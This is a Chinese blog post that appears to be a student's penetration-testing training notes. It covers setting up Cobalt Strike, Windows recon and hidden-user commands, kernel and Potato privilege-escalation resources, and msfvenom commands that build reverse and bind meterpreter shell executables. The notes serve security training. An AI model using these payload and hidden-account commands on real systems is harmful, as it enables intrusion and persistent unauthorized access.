实训第九天

作业

1.CS的安装步骤

参考:

Cobalt Strike工具安装与基础使用_cobalt strike下载-CSDN博客

https://blog.csdn.net/qq_44159028/article/details/118157559

后渗透工具-CobaltStrike使用教程(安装及简单用法)_cobaltstrike的使用和安装unbuntu-CSDN博客

安装

cobalt_strike_4.7启动报错.teamserver: 行 6: .TeamServerImage: 权限不够(解决方法)_cobalt strike 权限不够-CSDN博客

在这里插入图片描述

报错

cobalt strike出现连接超时情况解决办法 - anweilx - 博客园 (cnblogs.com)

!!!记得配置云服务器的防火墙出站入站规则

启动

服务器端 ./teamserver 47.109.194.23 110

客户端进行连接

2.总结用户组和用户、windows信息搜集命令

新增用户net user [username ] [password]/add
删除用户net user [username ] /delete
新增隐藏用户net user [username]$ [password]
删除隐藏用户net user [username ] /delete
新增用户组net localgroup [groupname] /add
删除用户组net localgroup [groupname] /delete
添加用户到用户组net localgroup [groupname] [username] /add
从用户组中删除用户net localgroup [groupname] [username] /delete
查询系统信息systeminfo
主机名hostname
查看用户信息net user
查看服务pid号netstat -ano
查看系统名wmic os get caption
查看补丁信息wmic qfe get Description,HotFixID,InstalledOn
查看当前安装程序wmic product get name,version
查询本机服务wmic service list brief
查询本机进程wmic process list brief
查看本机共享列表net share
查看防火墙配置netsh firewall show config
查看当前用户whoami
显示本地计算机或远程计算机上当前正在运行的进程列表tasklist

3.总结手工提权思路,使用土豆提权

1.总结

找系统缺失的补丁,找对应的提权漏洞,进行提权

2.土豆提权

4.用CS插件提权,提虚拟机或本地都行

在阿里云上启动server

客户端进行连接

并生成可执行权限

将生成的可执行文件放入windows server 2022,点击进行上线

完成提权

Windows提权——知识点

思路:找系统缺失的补丁,打漏洞

类型:

1、Web到Win系统提权-权限差异原因

2、Web到Win系统提权-溢出漏洞(MSF&CS)

3、Web到Win系统提权-集成软件(工具Bypass)

原理:

利用 Windows 系统本身存在的内核溢出漏洞,这些漏洞可能是由于程序在处理输入数据时没有正确边界检查,导致缓冲区溢出,使得攻击者可以覆盖关键的内存区域,如函数返回地址等,从而执行恶意代码来提升权限。

信息收集

要搜集的信息大致如下几点:

机器的系统及其版本

机器的打补丁情况

机器安装的服务

机器的防火墙策略配置

机器的防护软件情况

工具

Cobait

参考:

Cobalt Strike工具安装与基础使用_cobalt strike下载-CSDN博客

https://blog.csdn.net/qq_44159028/article/details/118157559

后渗透工具-CobaltStrike使用教程(安装及简单用法)_cobaltstrike的使用和安装unbuntu-CSDN博客

安装

添加执行权限

报错

cobalt strike出现连接超时情况解决办法 - anweilx - 博客园 (cnblogs.com)

启动

./teamserver 47.109.194.23 110 确定服务端

客户端连接

监听

生成Windows Executable程序

添加插件

MSF渗透框架

安装
curl [https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb](https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb) > msfinstall && \chmod 755 msfinstall && \./msfinstall

使用

Show options == options

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.100.132 lport=6666 -f exe -o test.exe
正向shell
msfvenom -p windows/x64/meterpreter/bind_tcp lhost=192.168.100.132 lport=6666 -f exe -o test.exe

# #lhost是受害主机ip, lport是受害机的端口
反向shell
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.100.132 lport=6666 -f exe -o test.exe

#lhost是我们的主机ip,lport是我们主机的用于监听的端口

提权漏洞合集

Ascotbe/Kernelhub: 🌴Linux、macOS、Windows Kernel privilege escalation vulnerability collection, with compilation environment, demo GIF map, vulnerability details, executable file (提权漏洞合集) (github.com)
简介 - Windows (ascotbe.com)
KernelHub
用于进行 操作系统内核漏洞利用

SecWiki/windows-kernel-exploits: windows-kernel-exploits Windows平台提权漏洞集合 (github.com)
https://github.com/nomi-sec/PoC-in-GitHub
Exploit-DB / Exploits + Shellcode + GHDB · GitLab

土豆家族

【内网攻防】权限提升-土豆提权大汇总 (qq.com)

下载链接

https://github.com/BeichenDream/BadPotato
https://github.com/BeichenDream/GodPotato
https://github.com/CCob/SweetPotato
https://github.com/klezVirus/CandyPotato
https://github.com/antonioCoco/RoguePotato
https://github.com/S3cur3Th1sSh1t/MultiPotato
https://github.com/crisprss/RasmanPotato
https://github.com/wh0amitz/PetitPotato
https://github.com/antonioCoco/JuicyPotatoNG
https://github.com/BeichenDream/PrintNotifyPotato
https://github.com/Prepouce/CoercedPotato
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值